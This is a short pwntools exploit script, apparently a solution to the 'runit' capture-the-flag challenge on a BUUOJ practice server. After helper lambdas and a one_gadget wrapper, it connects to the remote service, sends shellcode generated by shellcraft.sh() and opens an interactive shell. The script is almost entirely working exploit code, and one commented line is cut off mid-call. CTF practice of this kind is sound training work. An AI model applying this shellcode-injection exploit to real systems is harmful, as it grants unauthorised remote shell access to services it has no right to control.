1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| from pwn import * from LibcSearcher import * import subprocess
s = lambda data: sh.send(data) sa = lambda delim, data: sh.sendafter(delim, data) sl = lambda data: sh.sendline(data) sla = lambda delim, data: sh.sendlineafter(delim, data) sea = lambda delim, data: sh.sendafter(delim, data) r = lambda numb=4096: sh.recv(numb) ru = lambda delims, drop=True: sh.recvuntil(delims, drop) info_addr = lambda tag, addr: sh.info(tag + ': {:#x}'.format(addr)) itr = lambda: sh.interactive() debug = lambda command='': gdb.attach(sh, command) context(arch='i386', os='linux',log_level="debug")
def one_gadget(filename): return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
# one_gadget('/lib/x86_64-linux-gnu/libc.so.6') # libc=LibcSearcher('puts',puts sh = remote('node3.buuoj.cn',25490)#process('/home/yk2/ctf/runit/pwn') ru('!!') sl(asm(shellcraft.sh()))
itr()
|